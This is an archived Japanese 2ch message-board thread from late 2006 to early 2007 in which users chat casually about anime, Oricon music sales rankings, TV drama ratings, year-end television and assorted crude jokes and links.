規制くらってたからようつべサーフィンしてたわけだけど
ハルヒってマジつまらないうえに観るのが苦痛。すごく疲れる。ただの萌えアニメだった。
ローゼンメイデンも観た。こっちもただの萌えアニメなんだけどハルヒよりは7割くらい面白かった。

207 :sophie@VEX ◆ru9iMUTANc :2006/11/12(日) 18:43:43
@凡_凡
 |   |
 |   |  ←コンビニ袋を平らにのばす
  |___.|

A凡_凡
 |   |
 |   |   
  \___/   ←両端を切る

B(・∀・)ワーイ
\凡_凡/ 
 |   |     スクール水着完成。
 |   |  
  \___/ 

http://ehoba.mydns.jp/phpuploader/img/pup996.jpg

208 :どっちの名無しさん?:2006/11/13(月) 19:34:06
地獄絵図
http://www.youtube.com/watch?v=Cjx6MlWZ2LE

209 :どっちの名無しさん?:2006/11/14(火) 18:19:56
ハルヒのがまだマシだったな俺は……
ローゼンメイデンというと、パロディもののAVがあってそれの感想ブログが笑えた。
ttp://blog.livedoor.jp/zot666/archives/50303490.html

210 :どっちの名無しさん?:2006/11/14(火) 22:04:05
なんかいくらでもありそうだねそういうの。
テニスの王子様のゲイビデオとかあった気が。

ハルヒは本編はまぁまぁ。他は観れたものじゃない。個人的なことを言わせてもらうと、
始めから終わりまで延々流れ続けるキョンの脳内ナレーションがウザい。
あれってキョン側の視点で描かれてるけど、オレのリアルでの思考はむしろハルヒなんだよね。
だからキョンのハルヒに対する無粋で辛辣なツッコミが非常に不快。

211 :sophie@VEX ◆ru9iMUTANc :2006/11/14(火) 22:26:06
>>208
これってそれほど価値あるとは思えないんだけど
>>209
ごめん わからん 今はこれに萌えてた
deepsメインボーカルのCHIKAの近況↓
http://image.blog.livedoor.jp/heavysmokersforest/imgs/1/5/15350801.jpg
>>210
テニスしかわからん

212 :どっちの名無しさん?:2006/11/14(火) 22:58:22
あ、これね。
http://www.gay.jp/VJ/label/spr/main/64.html

ソニーって世間に比べて2ちゃんでの評価が低すぎる気がする まぁたしかに、タイマーとか工作員とかあるんだろうけど。
PS3にしても、ゲームの発展にHDDやブルーレイが必要なら、コストやサイズだって仕方ないじゃん。
だいたいあれって儲けようとしたら20万円超えるでしょ。

213 :どっちの名無しさん?:2006/11/15(水) 18:01:50
2ちゃんのソニーバッシングぶりはうざいね。まああの動画の人はDQNの類にしか見えないが。
とりあえず評価の付け方で最上のが「グレート」ってなんですかそのサイト。

214 :sophie@VEX ◆ru9iMUTANc :2006/11/17(金) 18:36:23
http://www.konamistyle.jp/ecitem/item29588.html
これ買ってくる

215 :どっちの名無しさん?:2006/11/17(金) 20:22:57
意図はわからんが、どんな理由であれ100%後悔すると思う。
この女の子がハロプロの人なの?

216 :どっちの名無しさん?:2006/11/17(金) 20:39:33
http://streaming.yahoo.co.jp/special/anime/freedom/

FREEDOM1無料配信中
宇多田のために観た。
まぁ結構面白いね。個人的に基本的にレースとか車とかがうけつけないのが困る。
あとキャラが不細工すぎ。女が全体的に酷い。ビスマルクたんは萌えるけどね。
そして1話30分入り4000円はボッタくりすぎだろう・・・

217 :どっちの名無しさん?:2006/11/19(日) 09:39:58
なかなか面白い。この世界だとカップヌードルはビールか何かのように飲まれているんだな。
俺としてはカップヌードルのスープを飲もうとは絶対思わないんだが。
絵はAKIRAの人だね。AKIRAは登場するある女性キャラと主人公の顔が似ているという素晴らしいキャラデザを発揮していたよ。
まあ所謂流行へのアンチテーゼじゃない? 俺はあまり気にならない。

>>214
それって大きいお友達にも人気のやつか。
着せ替えってのが古くから女児の心を掴むキーワードみたいだね。最近だとラブベリもそうだし。
まあファンも行き過ぎるとコレクターになるからね、面白いか否かはあまり関係ないんだろ。


218 :どっちの名無しさん?:2006/11/19(日) 16:06:04
キャラゲーって本来そういうもので中身は気にされないんだけど(この前出たジョジョのゲームとかね)
それにしてもこれはちょっと…って感じがする

219 :sophie@VEX ◆ru9iMUTANc :2006/11/20(月) 01:08:54
そっちキタか 着せ替えとかラブベリとかじゃあない
俺は月島きらりcのファンなんだ

220 :sophie@VEX ◆ru9iMUTANc :2006/11/21(火) 11:31:56
>>216
このDVDって売れるのかな
宇多田は神タイアップが多いな

221 :sophie@VEX ◆ru9iMUTANc :2006/11/21(火) 11:32:57
ミスチルのしるしの初動は35万
新曲は1/24発売 詳細は別スレで

222 :sophie@VEX ◆ru9iMUTANc :2006/11/21(火) 11:36:18
2006オリ年間シングル(2005/12/05付〜2006/11/20付迄)

*1 1,038,430 ***,*** Real Face KAT-TUN 2006/03/22
*2 *,756,218 ***,*** 粉雪 レミオロメン 2005/11/16 累計849,702
*3 *,675,559 ***,406 青春アミーゴ 修二と彰 2005/11/02 累計1,620,874
*4 *,598,951 ***,*** 抱いてセニョリータ 山下智久 2006/05/31
*5 *,566,233 ***,*** SIGNAL KAT-TUN 2006/07/19
*6 *,562,196 ***,*** ただ…逢いたくて EXILE 2005/12/14
*7 *,350,000 350,000 しるし Mr.Children 2006/11/15
*8 *,519,963 ***,832 純恋歌 湘南乃風 2006/03/08
*9 *,486,642 ***,*** supernova/カルマ BUMP OF CHICKEN 2005/11/23
10 *,474,686 **2,748 タイヨウのうた Kaoru Amane 2006/08/30

勝運が今年のオリコン最後の週に新曲出すが、それほど売れないだろう

223 :sophie@VEX ◆ru9iMUTANc :2006/11/21(火) 11:37:24
2006オリ年間アルバム(2005/12/05付〜2006/11/20付迄)

*1 2,065,931 ***,820 Complete Single Collection '95-'05 歌バカ 平井 堅 2005/11/23
*2 1,763,242 **1,277 BEST〜second session〜 倖田來未 2006/03/08
*3 1,589,193 *78,812 ALL SINGLES BEST コブクロ 2006/09/27
*4 1,221,632 **1,105 Catch The Wave Def Tech 2006/04/26
*5 1,191,725 ***,*** B'z The Best "PleasureU" B'z 2005/11/30 
*6 1,103,925 ***,938 BEST 中島美嘉 2005/12/07   
*7 *,878,960 ***,849 ULTRA BLUE 宇多田ヒカル 2006/06/14
*8 *,877,433 ***,*** (miss)understood 浜崎あゆみ 2006/01/01
*9 *,866,948 ***,*** NAMELESS WORLD コブクロ 2005/12/21
10 *,830,953 ***,645 LOVE COOK 大塚 愛 2005/12/14

宇多田はオリジナルアルバムでは第2位 インディーズを省けば1位

224 :どっちの名無しさん?:2006/11/21(火) 15:50:08
1位ってデフテック?

225 :sophie@VEX ◆ru9iMUTANc :2006/11/21(火) 17:49:35
どう考えても
シンコレとかベストとかタイトルにあるからデフテック
でも解散したけどね 結局3枚しか出さなかったけど一生分は稼いだだろうな

226 :どっちの名無しさん?:2006/11/22(水) 00:53:56
もう今年も終わりだね。紅白って苦笑いのために見ると少し面白い。
オレはオカルトについての討論番組観るけど。

>Real Face KAT-TUN
誰だ?わからん。
>粉雪 レミオロメン
VIPPERが騒いでた印象があるね。
>青春アミーゴ 修二と彰
ドラマで流行ってたのは知ってる。
>抱いてセニョリータ 山下智久
Mステくちパクをコピペで知った。懐かしいw
>純恋歌 湘南乃風
誰だ
>supernova/カルマ BUMP OF CHICKEN
あんまりこういうのを一括りにするのはどうかと思うんだけど、中学2年生っぽい題名だなぁとは感じる。。。誰でもそうだよね?
>タイヨウのうた Kaoru Amane
誰だ

アルバムは好きな2人以外はアー名しかわからない。
B'zのベストともなれば何かもっと多いイメージなのだけれど。

227 :sophie@VEX ◆ru9iMUTANc :2006/11/22(水) 19:07:46
紅白はここまで完成された茶番はないってくらい不自然な雰囲気が大好き

228 :どっちの名無しさん?:2006/11/22(水) 20:54:16
年末に格闘技観る人もいるのかな。ここ数年で急速に台頭してきたね。アケボノとボブサップとか。
スポーツは観るよりやるもんだと思うんだけどなぁ。
音楽でも絵画でも文学でも映画でも漫画でも、何でも自分で創る方が楽しい。
中でもスポーツは自分でやらなきゃ意味ないと思うんだ。まぁ格闘技はホイホイとできるもんじゃないけど。
何にせよ興味ない

229 :sophie@VEX ◆ru9iMUTANc :2006/11/23(木) 14:54:48
大晦日とか好きなタイプ?祭りとか嫌いなタイプ?
やっぱ全国民の大半が紅白とかK1とか好きなんだから
それが嫌いな人は普通じゃないのかなー
因みに俺は大晦日とか紅白とか好きなタイプ
でもクリスマスイヴは好きじゃあない いっせいにセックスする日とか意味わからん

230 :どっちの名無しさん?:2006/11/23(木) 15:38:25
>>229
誰がそんなことを?

231 :どっちの名無しさん?:2006/11/23(木) 16:07:42
クリスマスもお正月も紅白も全然アリ。少なくとも楽しみどころはわかる。
格闘技は本当に意味わかんないなー、何が面白いんだろう?
そのうえ時々「八百長だ」とか言い出すからなおさら意味がわからない。エンターテイメントなんだから当たり前じゃん。見なきゃいいのに。
オレは安易に「まぁ人それぞれだよね」にしてしまうのが嫌いなので、誰かに教えてもらいたいとは思う。

232 :どっちの名無しさん?:2006/11/24(金) 04:52:34
>>230
クリスマスの夜9時以降は一番性交の行われている時らしい。


格闘技って、確かに面白くない。
でもキッドと魔裟斗は面白かったかな。

233 :どっちの名無しさん?:2006/11/25(土) 00:25:59
キッカケが欲しいってだけじゃないかな
よく「クリスチャンじゃないのにクリスマスを祝うなんて日本人は〜」とか言う人がいるけど、
なんかナンセンスだなぁみたいな。オレもクリスマス楽しむ人に共感はできないけどね、容認。
オレは宇宙人、未来人、異世界人、超能力者はいると思う。
でも共感できない人から見たら、それもあまり合理的な考えではないかも。。。?
はたから見たら、両方ともロマンチストであることは変わんないね。

234 :どっちの名無しさん?:2006/11/25(土) 02:41:28
オレもいると思うよ
人型生物は地球だけじゃないよな

235 :どっちの名無しさん?:2006/11/25(土) 12:59:41
最近面白かったこと

コナンのOPがひどい
http://www.youtube.com/watch?v=wo5PnSTf0Is&eurl=
きらめき?特にラップがむごい

ハバネロ
http://boukun.jp/boudai/index.html
ぼくは50点だったよ

最近の千葉県のセンスはすごい。ゴロとかマスコットとか。
http://blog.livedoor.jp/dqnplus/archives/850655.html
http://www.ckz.jp/saisei/index.htm

VIPに電波さん降臨とか
http://www.kajisoku.com/archives/eid622.html

236 :どっちの名無しさん?:2006/11/25(土) 18:15:00
●ニセ「あゆ&長瀬」が都内を徘徊中!−写真撮影やサインにも応じる

週刊現代(12/9) 189

237 :どっちの名無しさん?:2006/11/25(土) 19:04:04
ハバネロは確か攻略法があったはず。
人生とは何か、は半角スペースで満点もらえる。

238 :sophie@VEX ◆ru9iMUTANc :2006/11/25(土) 21:25:10
>>236
ワロ

239 :sophie@VEX ◆ru9iMUTANc :2006/11/25(土) 21:35:21
ラップはあってなさすぎ
ハバネロ難しいね 苦手
千葉はアホ

240 :どっちの名無しさん?:2006/11/27(月) 09:47:12
こんなくだらねーもんに金かけてズルイ
http://www.youtube.com/watch?v=h3aXa2VpHVU
http://www.youtube.com/watch?v=e8_nKeKVgvQ&mode=related&search=
さっさと作画崩壊しろや

241 :どっちの名無しさん?:2006/11/28(火) 19:21:32
なんだか意外と面白そうだなって思ってしまった。

242 :どっちの名無しさん?:2006/11/28(火) 19:23:33
月【21】のだめ       18.2__16.1__18.4__18.3__19.9__17.5__19.4
火【21】役者魂!.   11.4__*8.4__11.8__*9.2__*8.2__*9.9__
  【22】僕の歩く道   19.3__16.4__17.7__18.2__17.9__16.0__15.9__
水【22】14才の母.   19.7__16.8__18.3__19.4__17.3__16.7__18.4__
木【20】おみやさん..... 15.0__12.5__12.0__12.6__11.3__
  【21】だめんず    10.3__*8.0__*7.2__*7.4__*8.6__*9.0__
  【22】嫌われ松子... *8.8__10.1__*8.5__*8.5__*8.4__*8.3__*8.4__
  【22】Dr.コトー2006 23.2__21.5__21.6__22.3__21.9__19.1__21.1__
金【21】家族.       13.0__11.4__13.1__13.7__11.3__*9.6__
  【22】セーラー服..... 17.3__14.2__*9.6__16.0__10.8__12.0__13.0(終)._______________________________13.27
     笑える恋.     <12/01スタート>
  【23】アンナさん.   *8.1__*7.1__*7.3__*5.9__*8.1__*6.4__*6.3__
土【21】たったひとつ.....12.8__10.4__12.2__13.6__10.5__10.3__10.6__
日【21】鉄板少女.   11.0__*7.3__*8.7__10.3__*8.7__*6.5__*8.4__




コトー人気あるなあやっぱ。
てか結局のだめしか観てない。14歳の母より視聴率高いんだな。

243 :どっちの名無しさん?:2006/11/29(水) 06:44:52
全部観てないけど、その中ならだめんずうぉーかー観てみたいな。
ダメな男たち「だめんず」ばかり好きになってしまう女たちの話と聞いたが、
(以下オレの予想だけど)
その「だめんず」は浪費家、虚言癖、浮気性、DV、ホステス通いとかであって、
多分「キモヲタ」が入ってないであろうことに人間の限界を見れる気がする(笑)

244 :どっちの名無しさん?:2006/11/29(水) 07:20:22
http://p.pita.st/?m=qfcd96hd
昨日公園でやってみた。ハトは警戒心が強いから直接は難しいんだけど。
コツは目を合わせないようにすることである。

245 :どっちの名無しさん?:2006/11/29(水) 18:36:37
その形式の動画ってどうやって見るの?

246 :どっちの名無しさん?:2006/11/29(水) 21:37:23
realとか。
あと時間帯によって見れない

247 :どっちの名無しさん?:2006/12/01(金) 04:47:18
クイックタイムを随分前にアンインストールしていたせいで観れなかった。
こんなところで弊害が出るとは。





……そうか、昨日は俺の誕生日だったんだな。

248 :どっちの名無しさん?:2006/12/01(金) 20:26:09
女性は24から
男性は27から
歳をとるのが憂鬱になると聞いたな。
18になるとみんなから「AVみれるね」と言われてワンパターンだなぁと思う。先に言っておく

249 :sophie@VEX ◆ru9iMUTANc :2006/12/01(金) 20:33:54
さっき以前いたみみcってコテと掲示板でやりとりしてたよ
お互い頑張ろうねって言いたかった

>>248 なんとなく当たってるな 27
意識するのが24ぐらいで本格的に嫌になるのが30の節目過ぎた頃かな

250 :どっちの名無しさん?:2006/12/02(土) 23:35:58
ルイージ容疑者逮捕
http://news19.2ch.net/test/read.cgi/gamenews/1165054820/l50

251 :どっちの名無しさん?:2006/12/04(月) 23:47:02
類似ルイージルイルイ!


マリオじゃなくてルイージというチョイスにセンスを感じるな。

252 :どっちの名無しさん?:2006/12/06(水) 12:32:44
上の方だけど全く同じことを思い浮かべた。

253 :どっちの名無しさん?:2006/12/08(金) 21:36:15
ELTそんなにひどかったの?

254 :どっちの名無しさん?:2006/12/11(月) 17:27:08
ラルグラド読んだらとらぶるが可哀相になってきた。

255 :どっちの名無しさん?:2006/12/13(水) 01:26:33
ゴーストうんこ  出たと思って下を見ると、便器には落ちてない。でも紙にはちゃんと付くうんこ。
クリーンうんこ  出たと思って下を見ると、確かに出ている。でも紙はよごれないうんこ。
ウェットうんこ  50回ふいても、まだ付いている気がするうんこ。万一のことを考えて、パンツにトイレットペーパーをあてがってトイレを出る。
セカンドうんこ  終わってパンツを上げかけたところで、再びもよおすうんこ。試してみると、確かにまだ出る。
ヘビーうんこ   食べ過ぎ飲み過ぎの翌日のうんこ。重くて流れにくい。
ロケットうんこ  すごい速度で出てくるので、パンツをすばやくおろさなくてはならない、そんなうんこ。
パワーうんこ   勢いがあるので、水がピチョンとはねかえってくるうんこ。広範囲をふかなくてはならない。
リキッドうんこ  液状で、一般に痛みと音がすさまじいうんこ。3日たっても痛いことがある。
ショッキングうんこ  においが強烈なため、便後1時間は誰もそのトイレに入れない、そんなうんこ。
アフターハネムーンうんこ  すぐそばに他の人がいても、平気で音とともに出せるようになる、そんなうんこ。
ボイスうんこ  あまりにも固くて切れないので、出すのにかけ声が必要なうんこ。
ブレイクうんこ  量が多すぎるため、休憩をとっていったん水を流さないとあふれてしまううんこ。
バック・トゥ・ネイチャーうんこ  森の中や田舎のあぜ道、時にはビルの地下などにナチュラルにしてあるうんこ。
インポッシブルうんこ  絶対にトイレに行けない状況のときにもよおすうんこ。すべてをあきらめるか、バック・トゥ・ネイチャーうんこしかない。
エアーうんこ  出そうな気はするのに、何回やっても屁しか出てこない仮のうんこ。
ノーエアーうんこ  屁だと思って軽く力を入れたら、出てきてしまったうんこ。多くの場合、取り返しのつかないことになる

256 :どっちの名無しさん?:2006/12/13(水) 13:15:42
多分滅茶苦茶面白いつもりで書いたんだろうけど
これで(プとか思う人間と思わない人間がイル

257 :どっちの名無しさん?:2006/12/13(水) 16:14:02
推薦の大学合格してた

258 :どっちの名無しさん?:2006/12/14(木) 04:02:39
おめ。

259 :どっちの名無しさん?:2006/12/23(土) 20:12:06
ちっ

260 : 【大吉】 【1549円】 :2007/01/01(月) 01:57:24
!omikuji!dama

261 :どっちの名無しさん?:2007/01/02(火) 12:51:12
YouTube - Mr.Children 「フェイク」 PV
http://www.youtube.com/watch?v=1Lz6KvjPsMA


ミスチルはそこそこいいな<先行 PVがいい
アルバムはDVD付きだから先行としての役割十分
あと40万完売するだろ 曲は微妙でも彗星でも40万いったんだから

262 :どっちの名無しさん?:2007/01/02(火) 16:52:03
個人的にはイマイチだったな。
箒星、しるしよりは好きだけど。正確にはこないだのアルバム以来微妙だミスチル。

263 :sophie ◆ru9iMUTANc :2007/01/06(土) 14:21:03
宇多田の新曲
http://www.youtube.com/watch?v=FJcASsDKDas

264 :どっちの名無しさん?:2007/01/06(土) 14:37:28
フェンリルへ




スレッドを立てられない奴はここへ書け!303
http://etc5.2ch.net/test/read.cgi/qa/1168043824/

265 :どっちの名無しさん?:2007/01/08(月) 22:14:32
http://jbbs.livedoor.jp/computer/22/
掲示板作った

266 :どっちの名無しさん?:2007/01/08(月) 22:18:02
アリ君、久しぶりですねー

267 :どっちの名無しさん?:2007/01/11(木) 23:13:20
アントいんの?どこに。

268 :どっちの名無しさん?:2007/01/11(木) 23:46:24
人生板の雑談スレらしいよ
いってあげな

269 :どっちの名無しさん?:2007/01/12(金) 19:49:38
http://2ch.net/

270 :どっちの名無しさん?:2007/01/12(金) 23:20:01
>>268
逝くわ。今度。

つか2ch閉鎖ってマジ!?

http://news20.2ch.net/test/read.cgi/news/1168584285/

271 :どっちの名無しさん?:2007/01/14(日) 00:17:31
もうどうでもいいな
どうせ避難所が2ちゃんになるだけだし
2ちゃんに友達みるのも飽きたカナ

272 :どっちの名無しさん?:2007/01/14(日) 01:03:04
この祭りまだやってたのか

273 :どっちの名無しさん?:2007/01/25(木) 17:47:12
217 :スペシャルな亜美と僕 ◆vSlHm02TeU :2006/12/23(土) 17:06:53
亜美たんの下痢飲みたいな

298 :スペシャルな亜美と僕 ◆vSlHm02TeU :2006/12/24(日) 09:29:13
亜美さまの下痢を夢で飲みました。

81 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)